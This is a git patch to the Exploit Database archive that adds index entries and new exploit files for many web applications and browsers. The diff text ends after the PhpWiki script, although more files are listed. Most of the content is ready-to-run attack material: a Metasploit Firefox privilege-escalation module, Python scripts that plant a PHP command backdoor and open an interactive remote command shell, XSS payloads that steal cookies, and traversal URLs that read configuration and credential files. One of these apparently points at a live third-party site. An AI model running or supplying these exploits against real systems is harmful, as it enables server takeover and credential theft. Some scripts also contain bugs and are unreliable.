From c93cd0e1b80a655ff324f8df8e1884b6ac8f3a2e Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 30 Aug 2014 04:42:49 +0000
Subject: [PATCH] Updated 08_30_2014

---
 files.csv                            |  28 ++++
 platforms/jsp/webapps/34440.txt      |   9 ++
 platforms/linux/dos/34427.txt        |   9 ++
 platforms/multiple/dos/34457.txt     |   9 ++
 platforms/multiple/remote/34439.txt  |  17 ++
 platforms/multiple/remote/34448.rb   | 150 +++++++++++++++++
 platforms/multiple/webapps/34449.txt |  19 +++
 platforms/php/webapps/34436.txt      |  40 +++++
 platforms/php/webapps/34438.txt      |  11 ++
 platforms/php/webapps/34441.txt      |  28 ++++
 platforms/php/webapps/34443.txt      |  10 ++
 platforms/php/webapps/34444.txt      |   7 +
 platforms/php/webapps/34445.txt      |   9 ++
 platforms/php/webapps/34446.txt      |  11 ++
 platforms/php/webapps/34447.py       |  82 ++++++++++
 platforms/php/webapps/34450.py       |  47 ++++++
 platforms/php/webapps/34451.py       |  53 ++++++
 platforms/php/webapps/34452.py       | 233 +++++++++++++++++++++++++++
 platforms/php/webapps/34453.txt      |   9 ++
 platforms/php/webapps/34454.txt      |   9 ++
 platforms/php/webapps/34455.txt      |   8 +
 platforms/php/webapps/34456.txt      | 132 +++++++++++++++
 platforms/php/webapps/34459.txt      |   9 ++
 platforms/php/webapps/34464.txt      |   9 ++
 platforms/windows/dos/34442.html     |  21 +++
 platforms/windows/dos/34458.html     |  82 ++++++++++
 platforms/windows/dos/34460.py       |  30 ++++
 platforms/windows/local/34463.py     |  46 ++++++
 platforms/windows/remote/34437.txt   |   9 ++
 29 files changed, 1136 insertions(+)
 create mode 100755 platforms/jsp/webapps/34440.txt
 create mode 100755 platforms/linux/dos/34427.txt
 create mode 100755 platforms/multiple/dos/34457.txt
 create mode 100755 platforms/multiple/remote/34439.txt
 create mode 100755 platforms/multiple/remote/34448.rb
 create mode 100755 platforms/multiple/webapps/34449.txt
 create mode 100755 platforms/php/webapps/34436.txt
 create mode 100755 platforms/php/webapps/34438.txt
 create mode 100755 platforms/php/webapps/34441.txt
 create mode 100755 platforms/php/webapps/34443.txt
 create mode 100755 platforms/php/webapps/34444.txt
 create mode 100755 platforms/php/webapps/34445.txt
 create mode 100755 platforms/php/webapps/34446.txt
 create mode 100755 platforms/php/webapps/34447.py
 create mode 100755 platforms/php/webapps/34450.py
 create mode 100755 platforms/php/webapps/34451.py
 create mode 100755 platforms/php/webapps/34452.py
 create mode 100755 platforms/php/webapps/34453.txt
 create mode 100755 platforms/php/webapps/34454.txt
 create mode 100755 platforms/php/webapps/34455.txt
 create mode 100755 platforms/php/webapps/34456.txt
 create mode 100755 platforms/php/webapps/34459.txt
 create mode 100755 platforms/php/webapps/34464.txt
 create mode 100755 platforms/windows/dos/34442.html
 create mode 100755 platforms/windows/dos/34458.html
 create mode 100755 platforms/windows/dos/34460.py
 create mode 100755 platforms/windows/local/34463.py
 create mode 100755 platforms/windows/remote/34437.txt

diff --git a/files.csv b/files.csv
index fc6f81d60..46401420c 100755
--- a/files.csv
+++ b/files.csv
@@ -31006,9 +31006,37 @@ id,file,description,date,author,platform,type,port
 34421,platforms/linux/local/34421.c,"glibc Off-by-One NUL Byte gconv_translit_find Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0
 34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple XSS Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0
 34426,platforms/linux/remote/34426.txt,"uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection Vulnerability",2010-08-05,Chuzz,linux,remote,0
+34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption Vulnerability",2010-08-07,"Georgi Guninski",linux,dos,0
 34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 '.m3u' File Buffer Overflow Vulnerability",2010-08-09,"Abhishek Lyall",windows,dos,0
 34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0
 34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0
 34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0
 34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0
 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0
+34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
+34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0
+34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0
+34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0
+34440,platforms/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 'doSave.jsp' Remote Code Execution Vulnerability",2010-08-12,"Giorgio Fedon",jsp,webapps,0
+34441,platforms/php/webapps/34441.txt,"JForum 2.08 BBCode Color Tag HTML Injection Vulnerability",2010-05-13,"Giorgio Fedon",php,webapps,0
+34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 ActiveX Control 'ShowBar' Method Buffer Overflow Vulnerability",2009-09-19,the_Edit0r,windows,dos,0
+34443,platforms/php/webapps/34443.txt,"PaoLink 1.0 'scrivi.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
+34444,platforms/php/webapps/34444.txt,"RSSMediaScript 'index.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
+34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 Comment Topic Header XSS",2009-08-31,Inj3ct0r,php,webapps,0
+34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 include/ajax/blogInfo.php asd Parameter XSS",2009-08-31,Inj3ct0r,php,webapps,0
+34447,platforms/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80
+34448,platforms/multiple/remote/34448.rb,"Firefox WebIDL Privileged Javascript Injection",2014-08-28,metasploit,multiple,remote,0
+34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0
+34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
+34451,platforms/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
+34452,platforms/php/webapps/34452.py,"XRMS - Blind SQL Injection and Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
+34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 index.php URI XSS",2009-09-16,Moudi,php,webapps,0
+34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 scrivi.php URI XSS",2009-09-16,Moudi,php,webapps,0
+34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 'news.php' Multiple SQL Injection Vulnerabilities",2010-08-12,Affix,php,webapps,0
+34456,platforms/php/webapps/34456.txt,"JBoard Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0
+34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-14,"Luigi Auriemma",multiple,dos,0
+34458,platforms/windows/dos/34458.html,"Internet Explorer MS14-029 Memory Corruption PoC",2014-08-28,PhysicalDrive0,windows,dos,0
+34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0
+34460,platforms/windows/dos/34460.py,"Sonique 2.0 '.xpl' File Remote Stack-Based Buffer Overflow Vulnerability",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0
+34463,platforms/windows/local/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,local,0
+34464,platforms/php/webapps/34464.txt,"SyntaxCMS 'rows_per_page' Parameter SQL Injection Vulnerability",2010-08-10,"High-Tech Bridge SA",php,webapps,0
diff --git a/platforms/jsp/webapps/34440.txt b/platforms/jsp/webapps/34440.txt
new file mode 100755
index 000000000..f835210a6
--- /dev/null
+++ b/platforms/jsp/webapps/34440.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42413/info
+
+Computer Associates Oneview Monitor is prone to a remote code-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to inject and execute arbitrary JSP code in the context of the affected webserver. 
+
+The following example URI is available:
+
+ttp://www.example.com/sitemindermonitor/doSave.jsp?file=../attacksample.jsp 
\ No newline at end of file
diff --git a/platforms/linux/dos/34427.txt b/platforms/linux/dos/34427.txt
new file mode 100755
index 000000000..ef9a31494
--- /dev/null
+++ b/platforms/linux/dos/34427.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42306/info
+
+OpenSSL is prone to a remote memory-corruption vulnerability.
+
+Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the application using the vulnerable library. Failed exploit attempts will result in a denial-of-service condition.
+
+The issue affects OpenSSL 1.0.0a; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/34427.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/34457.txt b/platforms/multiple/dos/34457.txt
new file mode 100755
index 000000000..2cbcdcd02
--- /dev/null
+++ b/platforms/multiple/dos/34457.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42428/info
+
+Sniper Elite is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
+
+Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+Versions prior to Sniper Elite 1.0 are vulnerable.
+
+http://www.exploit-db.com/sploits/34457.zip
\ No newline at end of file
diff --git a/platforms/multiple/remote/34439.txt b/platforms/multiple/remote/34439.txt
new file mode 100755
index 000000000..fbdd4845f
--- /dev/null
+++ b/platforms/multiple/remote/34439.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/42411/info
+
+ServletExec is prone to a directory-traversal vulnerability and multiple authentication-bypass vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to gain administrative access to the affected application and to obtain sensitive information that could aid in further attacks.
+
+Versions prior to ServletExec 6.0.0.2_39 are vulnerable. 
+
+http://www.example.com/servlet/pagecompile._admin._help._helpContent_xjsp?page=../../WEB-INF/web.xml
+http://www.example.com/servlet/pagecompile._admin._login_xjsp
+http://www.example.com/servlet/pagecompile._admin._vmSystemProperties_xjsp
+http://www.example.com/servlet/pagecompile._admin._SELogging_xjsp
+http://www.example.com/servlet/pagecompile._admin._userMgt_xjsp
+http://www.example.com/servlet/pagecompile._admin._virtualServers_xjsp
+http://www.example.com/servlet/pagecompile._admin._optionalPackages_xjsp
+http://www.example.com/servlet/pagecompile._admin._dataSources_xjsp
+http://www.example.com/servlet/pagecompile._admin._debug_xjsp
\ No newline at end of file
diff --git a/platforms/multiple/remote/34448.rb b/platforms/multiple/remote/34448.rb
new file mode 100755
index 000000000..2f1939d79
--- /dev/null
+++ b/platforms/multiple/remote/34448.rb
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/exploitation/jsobfu'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
+
+  autopwn_info({
+    :ua_name    => HttpClients::FF,
+    :ua_maxver  => "22.0",
+    :ua_maxver  => "27.0",
+    :javascript => true,
+    :rank       => ExcellentRanking
+  })
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Firefox WebIDL Privileged Javascript Injection',
+      'Description'    => %q{
+        This exploit gains remote code execution on Firefox 22-27 by abusing two
+        separate privilege escalation vulnerabilities in Firefox's Javascript
+        APIs.
+      },
+      'License' => MSF_LICENSE,
+      'Author'  => [
+        'Marius Mlynski', # discovery and pwn2own exploit
+        'joev' # metasploit module
+      ],
+      'DisclosureDate' => "Mar 17 2014",
+      'References' => [
+        ['CVE', '2014-1510'], # open chrome:// url in iframe
+        ['CVE', '2014-1511']  # bypass popup blocker to load bare ChromeWindow
+      ],
+      'Targets' => [
+        [
+          'Universal (Javascript XPCOM Shell)', {
+            'Platform' => 'firefox',
+            'Arch' => ARCH_FIREFOX
+          }
+        ],
+        [
+          'Native Payload', {
+            'Platform' => %w{ java linux osx solaris win },
+            'Arch'     => ARCH_ALL
+          }
+        ]
+      ],
+      'DefaultTarget' => 0,
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::FF,
+        :ua_ver  => lambda { |ver| ver.to_i.between?(22, 27) }
+      }
+    ))
+
+    register_options([
+      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
+    ], self.class)
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    send_response_html(cli, generate_html(target_info))
+  end
+
+  def generate_html(target_info)
+    key = Rex::Text.rand_text_alpha(5 + rand(12))
+    frame = Rex::Text.rand_text_alpha(5 + rand(12))
+    r = Rex::Text.rand_text_alpha(5 + rand(12))
+    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
+    data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
+               "{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
+               "'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
+
+    js = Rex::Exploitation::JSObfu.new(%Q|
+      var opts = #{JSON.unparse(opts)};
+      var key = opts['#{key}'];
+
+      // Load the chrome-privileged browser XUL script into an iframe
+      var c = new mozRTCPeerConnection;
+      c.createOffer(function(){},function(){
+        window.open('chrome://browser/content/browser.xul', '#{frame}');
+        step1();
+      });
+
+      // Inject a data: URI into an internal frame inside of the browser
+      // XUL script to pop open a new window with the chrome flag to prevent
+      // the new window from being wrapped with browser XUL;
+      function step1() {
+        var clear = setInterval(function(){
+
+          // throws until frames[0].frames[2] is available (when chrome:// iframe loads)
+          frames[0].frames[2].location;
+
+          // we base64 this to avoid the script tag screwing up things when obfuscated
+          frames[0].frames[2].location=window.atob('#{Rex::Text.encode_base64(data_uri)}');
+          clearInterval(clear);
+          setTimeout(step2, 100);
+        },10);
+      }
+
+      // Step 2: load the chrome-level window up with a data URI, which
+      // gives us same-origin. Make sure to load an "<iframe mozBrowser>"
+      // into the frame, since that will respond to our messageManager
+      // (this is important later)
+      function step2() {
+        var clear = setInterval(function(){
+          top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
+                             'src="about:blank"></iframe></body></html>';
+          clearInterval(clear);
+          setTimeout(step3, 100);
+        }, 10);
+      }
+
+      function step3() {
+        var clear = setInterval(function(){
+          if (!frames[0]) return; // will throw until the frame is accessible
+          top.vvv.messageManager.loadFrameScript('data:,'+key, false);
+          clearInterval(clear);
+          setTimeout(function(){top.vvv.close();}, 100);
+        }, 10);
+      }
+
+    |)
+
+    js.obfuscate
+
+    %Q|
+      <!doctype html>
+      <html>
+        <body>
+          <iframe id='#{frame}' name='#{frame}'
+                  style='position:absolute;left:-9999999px;height:1px;width:1px;'>
+          </iframe>
+          <script>
+            #{js}
+          </script>
+          #{datastore['CONTENT']}
+        </body>
+      </html>
+    |
+  end
+end
diff --git a/platforms/multiple/webapps/34449.txt b/platforms/multiple/webapps/34449.txt
new file mode 100755
index 000000000..0418b94de
--- /dev/null
+++ b/platforms/multiple/webapps/34449.txt
@@ -0,0 +1,19 @@
+>> User credential disclosure in ManageEngine DeviceExpert 5.9
+>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
+==========================================================================
+
+>> Background on the affected product:
+"DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management."
+
+
+>> Technical details:
+Vulnerability: User credential disclosure / CVE-2014-5377
+Constraints: no authentication or any other information needed.
+Affected versions: UNFIXED as of 27/08/2014 - current version 5.9 build 5980 is vulnerable, older versions likely vulnerable
+
+GET /ReadUsersFromMasterServlet
+
+Example response:
+<?xml version="1.0" encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>noreply@zohocorp.com</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>
+
+The passwords are a salted MD5 hash.
diff --git a/platforms/php/webapps/34436.txt b/platforms/php/webapps/34436.txt
new file mode 100755
index 000000000..4d2b005a7
--- /dev/null
+++ b/platforms/php/webapps/34436.txt
@@ -0,0 +1,40 @@
+#################################################################################################
+#
+# Title                : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
+# Severity             : High+/Critical
+# Reporter(s)          : Mehdi Karout & Christian Galeone
+# Google Dork          : inurl:wp/wp-content/force-download.php
+# Plugin Version       : 1.1
+# Plugin Name          : Download ShortCode
+# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
+# Vendor Home          : http://werdswords.com/
+# Date                 : 25/08/2014
+# Tested in            : Win7 - Kali Linux
+# CVE                  : CVE-2014-5465
+#
+##################################################################################################
+#
+# PoC :
+#
+#
+# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]
+#
+# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
+#
+# Exploit Code :
+#
+#    $file = $_GET['file'];
+#  if(isset($file))
+#  {
+#      include("pages/$file");
+#  }
+#  else
+#  {
+#      include("index.php");
+#  }
+# 
+# Demo :
+#
+# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
+#
+##################################################################################################
\ No newline at end of file
diff --git a/platforms/php/webapps/34438.txt b/platforms/php/webapps/34438.txt
new file mode 100755
index 000000000..106c3dbd1
--- /dev/null
+++ b/platforms/php/webapps/34438.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/42406/info
+
+TagCloud is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+TagCloud version 2.0 is vulnerable; other versions may also be affected. 
+
+The following example input is available:
+
+'Topic' Field: <script>javascript:alert("lolcats")</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/34441.txt b/platforms/php/webapps/34441.txt
new file mode 100755
index 000000000..071fa422a
--- /dev/null
+++ b/platforms/php/webapps/34441.txt
@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/42414/info
+
+JForum is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+JForum 2.08 is vulnerable; other versions may also be affected. 
+
+Stored XSS - proof of concept for Firefox ("onMouseOver" is blacklisted):
+
+    [color=red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)']XSS4FF[/color] 
+
+
+Renders into the following HTML code:
+
+    <font color='red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)'>XSS4FF</font> 
+
+
+
+Stored XSS - proof of concept for Internet Explorer ("style" cannot contain parenthesis "(" ):
+
+    [color=red' /style='color:expression(alert(document.cookie))']XSS4IE[/color] 
+
+
+
+Renders into the following HTML code:
+
+    <font color='red' /style='color:expression(alert(document.cookie))'>XSS4IE</font> 
diff --git a/platforms/php/webapps/34443.txt b/platforms/php/webapps/34443.txt
new file mode 100755
index 000000000..f6130b99e
--- /dev/null
+++ b/platforms/php/webapps/34443.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/42420/info
+
+PaoLink is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PaoLink 1.0 is vulnerable; other versions may also be affected. 
+
+ http://www.example.com/paolink/demo/scrivi.php/"><script>alert(document.cookie);</script>
+
diff --git a/platforms/php/webapps/34444.txt b/platforms/php/webapps/34444.txt
new file mode 100755
index 000000000..0c51cd993
--- /dev/null
+++ b/platforms/php/webapps/34444.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42421/info
+
+RSSMediaScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/demo/index.php?cat=5&page=1"><script>alert(document.cookie);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/34445.txt b/platforms/php/webapps/34445.txt
new file mode 100755
index 000000000..adb59cd52
--- /dev/null
+++ b/platforms/php/webapps/34445.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42422/info
+
+LiveStreet is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+LiveStreet 0.2 is vulnerable; other versions may also be affected.
+
+<img src =. onerror = alert ()>
\ No newline at end of file
diff --git a/platforms/php/webapps/34446.txt b/platforms/php/webapps/34446.txt
new file mode 100755
index 000000000..b9afa99ba
--- /dev/null
+++ b/platforms/php/webapps/34446.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/42422/info
+ 
+LiveStreet is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+ 
+LiveStreet 0.2 is vulnerable; other versions may also be affected.
+
+Cross Site Scripting:
+
+/include/ajax/blogInfo.php?asd=<script>alert(&#039;www.example.com&#039;)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/34447.py b/platforms/php/webapps/34447.py
new file mode 100755
index 000000000..93fcc6f53
--- /dev/null
+++ b/platforms/php/webapps/34447.py
@@ -0,0 +1,82 @@
+#!/usr/bin/env python
+
+
+# Exploit Title: Plogger Authenticated Arbitrary File Upload
+# Date: Feb 2014
+# Exploit Author: b0z
+# Vendor Homepage: www.plogger.org
+# Software Link: www.plogger.org/download
+# Version: Plogger prior to 1.0-RC1
+# CVE : 2014-2223
+
+import hashlib
+import os
+import zipfile
+
+import requests
+import time
+import argparse
+
+
+
+def login(session,host,username,password):
+    print "[+] Log in"
+
+    session.post('http://%s/plog-admin/plog-upload.php' % host, data={
+        "plog_username": username,
+        "plog_password": password,
+        "action": "log_in"
+    })
+
+def upload(session):
+    print "[+] Creating poisoned gift"
+    ## Write the backdoor
+    backdoor = open(magic + '.php', 'w+', buffering = 0)
+    backdoor.write("<?php system($_GET['cmd']) ?>")
+    backdoor.close
+
+    # Add true image file to block the race condition (mandatory not null)
+    image = open(magic + '.png', 'w+', buffering = 0)
+    image.write('A')
+    image.close
+
+    gift = zipfile.ZipFile(magic + '.zip', mode = 'w')
+    gift.write(magic + '.php')
+    gift.write(magic + '.png')
+    gift.close
+
+    os.remove(magic + '.php')
+    os.remove(magic + '.png')
+
+    gift = open(magic + '.zip', 'rb')
+    files= { "userfile": ("archive.zip", gift)}
+    session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,
+        data = {
+            "destination_radio":"existing",
+            "albums_menu" : "1",
+            "new_album_name":"",
+            "collections_menu":"1",
+            "upload":"Upload"
+    })
+
+    os.remove(magic + '.zip')
+    print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic)
+
+if __name__== "__main__":
+
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--host"        , help="Remote host",required=True)
+    parser.add_argument("--user"        , help="Username",required=True)
+    parser.add_argument("--password"    , help="Password",required=True)
+    args = parser.parse_args()
+
+    host     = args.host
+    username = args.user
+    password = args.user
+
+    magic = hashlib.sha1(time.asctime()).hexdigest()
+
+    session = requests.session()
+    login(session,host,username,password)
+    upload(session)
+
diff --git a/platforms/php/webapps/34450.py b/platforms/php/webapps/34450.py
new file mode 100755
index 000000000..d25944f4f
--- /dev/null
+++ b/platforms/php/webapps/34450.py
@@ -0,0 +1,47 @@
+###############################
+# ActualAnalyzer  exploit.
+# Tested on Lite version 
+# We load command into a dummy variable as we only have 6 characters to own the eval 
+# but load more as first 2 characters get rm'd.
+# We then execute the eval with backticks.
+# 11/05/2011
+##############################
+
+import urllib
+import urllib2
+import sys
+import time
+
+
+
+def banner():
+	print "	    ____                        __              __                  __                     "
+	print "	   / __/_  ______ _ ____ ______/ /___  ______ _/ /___ _____  ____ _/ /_  ______  ___  _____"
+	print "	  / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_  / / _ \/ ___/"
+	print "	 / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/  __/ /    "
+	print "	/_/  \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/     "
+	print "	             /_/                                                  /____/                   "
+
+
+def usage():
+	print "	[+] Usage:"
+	print "	[-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""
+	print "	[-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""
+
+banner()
+if len(sys.argv) < 6:
+	usage()
+	quit()
+domain = sys.argv[2]
+command = sys.argv[6]
+host = syst.argv[4]
+
+def commandexploit(domain,host,command):
+	url = 'http://' + domain + '/aa.php?anp=' + host 
+	data = None
+	headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
+	exploit1 = urllib2.Request(url,data,headers)
+	exploit2 = urllib2.urlopen(exploit1)
+
+commandexploit(domain,host,command)
+
diff --git a/platforms/php/webapps/34451.py b/platforms/php/webapps/34451.py
new file mode 100755
index 000000000..f921167aa
--- /dev/null
+++ b/platforms/php/webapps/34451.py
@@ -0,0 +1,53 @@
+###############################################################
+#    ____                    __                  _ __   _ 
+#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
+#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
+# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
+#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
+#             /_/ /_/         /_/                     
+# Diskovered in Nov/Dec 2011
+###############################################################
+
+import urllib
+import urllib2
+import sys
+def banner():
+	print "	    ____                    __                  _ __   _ "
+	print "	   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
+	print "	  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
+	print "	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
+	print "	/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
+	print "	             /_/ /_/         /_/                     \n"
+
+
+def usage():
+	banner()
+	print "	[+] Usage example"
+	print "	[-] python " + sys.argv[0] + " http://path.to/wiki"
+
+if len(sys.argv)< 2:
+	usage()
+	quit()
+
+domain = sys.argv[1]
+def commandexec(cmd):
+	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
+	cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
+	cmd2 = urllib2.urlopen(cmd1)
+	output = cmd2.read()
+	firstloc = output.find("123:::\n") + len("123:::\n")
+	secondloc = output.find("\n:::123")
+	return output[firstloc:secondloc]
+
+
+banner()
+print commandexec('uname -a')
+print commandexec('id')
+while(quit != 1):
+	cmd = raw_input('Run a command: ')
+	if cmd == 'quit':
+		print "[-] Hope you had fun :)"
+		quit = 1
+	if cmd != 'quit':
+		print commandexec(cmd)
+
